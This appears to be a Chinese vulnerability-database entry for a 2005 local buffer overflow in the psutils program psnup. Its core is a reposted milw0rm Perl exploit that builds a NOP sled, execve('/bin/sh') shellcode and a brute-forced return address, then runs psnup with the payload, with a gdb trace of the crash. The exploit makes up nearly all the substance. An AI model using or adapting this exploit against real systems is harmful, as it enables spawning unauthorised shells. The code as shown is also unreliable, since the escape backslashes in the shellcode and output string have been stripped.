PostScript Utilities – ‘psnup’ Local Buffer Overflow
漏洞ID | 1054973 | 漏洞类型 | |
发布时间 | 2005-03-21 | 更新时间 | 2005-03-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
# PostScript Utilities - psnup (all the utilities of the package are vulnerable) *
# *
# written by lammat just for practice purposes *
# tested against psutils-p17 *
# (gdb) r -8 `perl -e 'print "A"x250'` *
# The program being debugged has been started already. *
# Start it from the beginning? (y or n) y *
# Starting program: /usr/bin/psnup -8 `perl -e 'print "A"x250'` *
# (no debugging symbols found).../usr/bin/psnup: can't open input file *
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... *
# *
# Program received signal SIGSEGV, Segmentation fault. *
# 0x41414141 in ?? () *
# execve(/bin/sh) for linux x86
# 29 bytes
# by Matias Sedalo
$shellcode =
"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68".
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";
$len = 250;
$ret = 0xbffff3a0;
$nop = "x90";
$oops="/usr/bin/psnup";
$offset = 900;
# offset bruteforce purposes below
if (@ARGV == 1) {
$offset = $ARGV[0];}
for ($i=0; $i<($len-length($shellcode)-100);$i++)
{$buffer .= $nop;
}
$buffer .= $shellcode;
print ("Address: 0x",sprintf('%lx',($ret + $offset)),"n");
$new_ret = pack('l',($ret + $offset));
until(length($buffer)==$len)
{
$buffer.=$new_ret;
}
exec("$oops -8 $buffer");
# milw0rm.com [2005-03-21]
相关推荐: LocalWEB2000 Directory Traversal Vulnerability
LocalWEB2000 Directory Traversal Vulnerability 漏洞ID 1103476 漏洞类型 Input Validation Error 发布时间 2001-01-22 更新时间 2001-01-22 CVE编号 N/A …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666